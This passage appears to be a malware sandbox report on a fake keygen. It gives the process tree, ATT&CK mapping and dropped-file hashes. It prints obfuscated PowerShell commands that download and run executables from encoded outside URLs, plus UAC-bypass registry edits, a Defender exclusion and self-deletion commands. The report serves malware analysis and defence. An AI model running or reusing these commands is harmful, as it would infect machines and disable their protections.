$mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1076

C:\Users\Public\zkh.exe
"C:\Users\Public\zkh.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2920

C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
"C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3028

C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
"C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2124

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 2124 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\712365987067906\\* & exit
8⤵
PID:2016

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 2124
9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:980

C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
"C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3060

C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
"C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
7⤵
- Executes dropped EXE
PID:2212

C:\Users\Public\zkh.exe
"C:\Users\Public\zkh.exe"
6⤵
- Executes dropped EXE
PID:1552

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3082.tmp\m1.hta"
3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1928

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044

C:\Users\Public\zkh.exe
"C:\Users\Public\zkh.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2400

C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
"C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1568

C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
"C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 2860 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\397060367355630\\* & exit
8⤵
PID:2372

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 2860
9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1400

C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
"C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2544

C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
"C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
7⤵
- Executes dropped EXE
PID:2588

C:\Users\Public\zkh.exe
"C:\Users\Public\zkh.exe"
6⤵
- Executes dropped EXE
PID:2680

C:\Windows\SysWOW64\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:1892

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3082.tmp\b.hta"
3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1420

C:\Users\Public\ewd.exe
"C:\Users\Public\ewd.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2900

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
6⤵
- Loads dropped DLL
PID:1788

C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
"C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3012

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
8⤵
- Loads dropped DLL
PID:2940

C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
"C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2748

C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
"C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
10⤵
- Executes dropped EXE
PID:1604

C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
"C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:328

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 328 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\168153133790457\\* & exit
9⤵
PID:2996

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 328
10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2208

C:\Users\Public\ewd.exe
"C:\Users\Public\ewd.exe"
6⤵
- Executes dropped EXE
PID:2476

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3082.tmp\b1.hta"
3⤵
- Suspicious use of WriteProcessMemory
PID:1584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1480

C:\Windows\SysWOW64\timeout.exe
timeout 2
3⤵
- Delays execution with timeout.exe
PID:1580

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3082.tmp\ba.hta"
3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1084

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1488

C:\Users\Public\msr.exe
"C:\Users\Public\msr.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2496

C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
"C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2588

C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
"C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:2652

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 2652 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\483996907604505\\* & exit
8⤵
PID:1552

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 2652
9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1332

C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
"C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2628

C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
"C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
7⤵
- Executes dropped EXE
PID:2744

C:\Users\Public\msr.exe
"C:\Users\Public\msr.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
- Modifies system certificate store
PID:2684

C:\Users\Admin\AppData\Local\Temp\1wd1PPK5LT.exe
"C:\Users\Admin\AppData\Local\Temp\1wd1PPK5LT.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
"Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\1wd1PPK5LT.exe"'
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:800

C:\Users\Admin\AppData\Local\Temp\RBabUs54Us.exe
"C:\Users\Admin\AppData\Local\Temp\RBabUs54Us.exe"
7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3008

C:\Windows\SysWOW64\Notepad.exe
"C:\Windows\System32\Notepad.exe"
8⤵
PID:3064

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Public\Natso.bat
9⤵
PID:2676

C:\Windows\SysWOW64\reg.exe
reg delete hkcu\Environment /v windir /f
10⤵
- Modifies registry key
PID:952

C:\Windows\SysWOW64\reg.exe
reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
10⤵
- Modifies registry key
PID:2840

C:\Windows\SysWOW64\schtasks.exe
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
10⤵
PID:1108

C:\Windows\SysWOW64\cmd.exe
cmd /c start /min C:\Users\Public\x.bat
10⤵
PID:1720

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Public\Natso.bat
9⤵
PID:2852

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
10⤵
- Modifies registry class
PID:936

C:\Windows\SysWOW64\reg.exe
REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
10⤵
- Modifies registry class
PID:2880

C:\Windows\SysWOW64\cmd.exe
cmd /c start /min C:\Users\Public\x.bat
10⤵
PID:2224

C:\Program Files (x86)\internet explorer\ieinstal.exe
"C:\Program Files (x86)\internet explorer\ieinstal.exe"
8⤵
PID:1484

C:\Users\Admin\AppData\Local\Temp\eYPP1oZQ1b.exe
"C:\Users\Admin\AppData\Local\Temp\eYPP1oZQ1b.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1248

\??\c:\windows\SysWOW64\cmstp.exe
"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\wz10mta1.inf
8⤵
PID:1040

C:\Users\Admin\AppData\Local\Temp\EFWQHA1FzQ.exe
"C:\Users\Admin\AppData\Local\Temp\EFWQHA1FzQ.exe"
7⤵
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:560

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\msr.exe"
7⤵
PID:1592

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
8⤵
- Delays execution with timeout.exe
PID:2720

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\3082.tmp\ba1.hta"
3⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:848

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1868

C:\Users\Public\ewd.exe
"C:\Users\Public\ewd.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2356

C:\Users\Public\ewd.exe
"C:\Users\Public\ewd.exe"
6⤵
- Executes dropped EXE
PID:2964

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\MSVCP140.dll

Download Submit
C:\ProgramData\freebl3.dll

Download Submit
C:\ProgramData\freebl3.dll

Download Submit
C:\ProgramData\freebl3.dll

Download Submit
C:\ProgramData\mozglue.dll

Download Submit
C:\ProgramData\mozglue.dll

Download Submit
C:\ProgramData\mozglue.dll

Download Submit
C:\ProgramData\msvcp140.dll

Download Submit
C:\ProgramData\nss3.dll
MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
C:\ProgramData\nss3.dll
MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
C:\ProgramData\softokn3.dll

Download Submit
C:\ProgramData\softokn3.dll

Download Submit
C:\ProgramData\softokn3.dll

Download Submit
C:\ProgramData\sqlite3.dll

Download Submit
C:\ProgramData\vcruntime140.dll

Download Submit
C:\ProgramData\vcruntime140.dll

Download Submit
C:\ProgramData\vcruntime140.dll

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0c385001-0ea7-4f34-9abd-9ad9da541281

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2c552433-c0c6-4b59-b59d-98784320e1c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_39bd9ebf-efc5-491e-8507-4bc2976f8062

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c8219dea-eb1f-4be0-8df0-d020070897b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Local\Temp\1wd1PPK5LT.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\1wd1PPK5LT.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\3082.tmp\Keygen.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\3082.tmp\Keygen.exe

Download Submit
C:\Users\Admin\AppData\Local\Temp\3082.tmp\b.hta

